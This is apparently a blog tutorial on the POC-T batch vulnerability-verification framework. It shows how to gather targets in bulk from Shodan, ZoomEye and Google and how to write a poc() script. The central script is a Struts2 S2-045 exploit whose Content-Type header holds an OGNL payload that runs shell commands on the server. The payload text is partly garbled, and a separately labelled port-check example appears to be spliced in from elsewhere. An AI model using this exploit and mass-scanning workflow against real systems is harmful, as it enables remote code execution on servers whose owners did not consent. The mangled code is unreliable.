Batch PoC verification for vulnerability emergency response

Posted by tzul at 2020-02-29

0x01 Preface

When a high-risk vulnerability surfaces on the Internet, or the team finds a 0day, both the customer (Party A) and the vendor (Party B) need to know the scope of its impact. That calls for batch PoC verification, and for security enthusiasts "batch" is the key word, so today we talk about "batch". There are already many excellent batch PoC verification tools. For example, pentestdb, which I posted about earlier, also integrates this function. The classic one is pocsuite; the one-stop service of pocsuite, ZoomEye and Seebug can be called the conscience of the industry. pocsuite requires you to write the fixed functions its template prescribes. The advantage is that it controls things directly at the HTTP request level, which makes features such as a global proxy and a global random User-Agent possible while keeping scripts stable and standardized, so customers or operations staff who do not understand the verification logic can simply run the script. But I always found it too heavy and not free enough: the output content, for instance, cannot be set freely. So is there a third-party library that can simply be imported, with no template and no inheritance, so that its functions can be extended while keeping maximum efficiency? A PoC verification framework where you do not have to check the document format every time you write a script, one command line, and the task is done in three to five minutes? That is POC-T, which I recommend to you today.

0x02 Introduction and installation

Batch verification has three key problems to solve: where the data comes from, what the processing logic is, and how to run it concurrently.

POC-T is designed around exactly these three points.

Installation is also very simple, so I won't spend space on it here:

```
git clone <POC-T repository URL>
pip install -r requirement.txt
python
```

0x021 Where the data comes from

Data sources are rich and thoughtful: a single target (-iS), file import (-iF), and search engine interfaces including Google (-aG), ZoomEye (-aZ) and Shodan (-aS). The API keys for these interfaces can be entered manually at runtime or preset in toolkit.conf in the root directory. Google search also supports a proxy for getting past the firewall; thoughtful, isn't it? The -limit parameter limits the number of search results. See the help for the other sources.

0x022 What the processing logic is

The verification logic is the PoC itself. The script directory contains many PoC scripts maintained by the author; use the --show parameter to list the PoC script names.

A PoC is loaded with the parameter -s <poc name>.

0x023 How concurrency is implemented

As users we don't need to worry about how concurrency is implemented; it's enough to know that two modes are supported, multithreading (-eT) and gevent (-eG). POC-T is very efficient: according to the author's tests, with the thread count set to 30 (default 10), 2000+ targets are tested in under 3 minutes.

The final command format looks like this:

```
python -s <poc name> -aZ "port:22" -limit 100
python -s <poc name> -aG "url:index.php" -limit 100 -gproxy "socks5 1080"
python -s <poc name> -iS http://host/login.php?id=1
python -s <poc name> -iF /root/pentest/vul.txt
```

0x03 PoC script writing

This is also the focus of this article. Why is POC-T so portable? I think it shows in PoC script writing. All verification needs is a single poc() function: on success it returns True or custom information, on failure it returns False, and beyond that there are no restrictions. Without an instance, all articles are paper tigers, so let's take the Struts2 S2-045 vulnerability, which was popular for a long time, as an example and walk through writing a PoC in detail. In the script directory there is a demo PoC script; we write our PoC on that basis.

The verification code circulating on the Internet is:


That's it. At runtime every thread of the framework calls the poc() function and passes the target URL into it. Now let's look at the effect: I import a target text file (one URL per line).

POC-T also provides general script extension tools. They simplify code, improve PoC accuracy and give scripts more capabilities. These tools live in the plugin directory; when writing a script you can call them directly with from plugin.util import xxx. For the specific functions, refer to the original comments.

Continuing with the PoC as the example: now we want to know not only whether a URL has the S2-045 vulnerability, but also whether specific ports such as 3389 and 22 are open, which helps with the next step of testing. Let's see whether the extension tools have the function we want.

In plugin.util there is a checkporttcp() function that checks whether a port is open, as long as you have an IP address.

But what gets passed in is the URL, not an IP address. The answer is again in plugin.util: host2ip() converts a URL to an IP address. With that, everything we need is there.

So our code can be written like this:

```python
import urllib2
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
from plugin.util import host2ip
from plugin.util import checkporttcp


def poc(url):
    register_openers()
    # multipart body; tmp.txt is any small local file used as the upload part
    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
    header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    # S2-045 OGNL payload in Content-Type, as published on the page (the @class@ references are garbled there)
    header["Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUti l.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask || whoami').(#iswin=(@[email protected]('').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c', #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}"
    try:
        request = urllib2.Request(url, datagen, headers=header)
        response = urllib2.urlopen(request, timeout=5)
        body = response.read()
    except Exception:
        body = ""
    ip = host2ip(url)              # convert the URL to an IP address
    port = checkporttcp(ip, 3389)  # check whether 3389 is open
    if "nMask" in body:
        return url + "---" + "3389:" + str(port)
    else:
        return False
```
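To make the poc() contract and the per-target threading concrete, here is an added Python 3 example that is not POC-T's code: host2ip() and check_port_tcp() are my stand-ins for the plugin.util helpers, run_batch() imitates the framework's thread mode, and local_listener() is a constructed fixture so the whole thing runs offline.

```python
# Added example, not POC-T's own code: a stand-in showing the poc() contract the
# article describes and a batch runner that drives it per target (like -eT).
# host2ip()/check_port_tcp() re-implement the plugin.util helpers discussed above.
import socket
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urlsplit

def host2ip(url):
    """Resolve the host part of a URL (or bare host) to an IPv4 address, else None."""
    parts = urlsplit(url if "://" in url else "//" + url)
    if not parts.hostname:
        return None
    try:
        return socket.gethostbyname(parts.hostname)
    except socket.gaierror:
        return None

def check_port_tcp(ip, port, timeout=2.0):
    """True if a TCP connection to ip:port completes within the timeout."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False

def poc(url, port=3389):
    """POC-T style check: custom info string on a hit, False otherwise.
    A 'hit' here means the target's port is reachable (an exposure check)."""
    ip = host2ip(url)
    if ip is None:
        return False
    if check_port_tcp(ip, port):
        return "%s---%d:open" % (url, port)
    return False

def run_batch(targets, poc_func, threads=10):
    """Call poc_func(url) once per target from a thread pool and keep only the
    targets whose result is truthy (True or an info string), as POC-T reports hits."""
    with ThreadPoolExecutor(max_workers=threads) as pool:
        hits = list(pool.map(poc_func, targets))
    return {url: hit for url, hit in zip(targets, hits) if hit}

def local_listener():
    """Constructed fixture: opens a TCP port on loopback, returns (socket, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]
```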


0x04 Other functions

Once we understand the three key problems that batch processing must solve, we find that this framework can be used not only for batch PoC verification but for anything that follows the same principle, such as brute-forcing, crawling, information collection and so on. The author also gives some examples.

0x05 Conclusion

After reading this article, the next time a vulnerability appears, instead of asking everywhere "where is the batch tool?", do it yourself and you will have plenty. But precisely because POC-T is light and flexible, it demands our coding ability: all of the verification logic and output has to be implemented by our own code, without any ready-made format specification. Other excellent batch PoC verification tools:

OK, that's it. Thank you for reading, and see you in the next issue.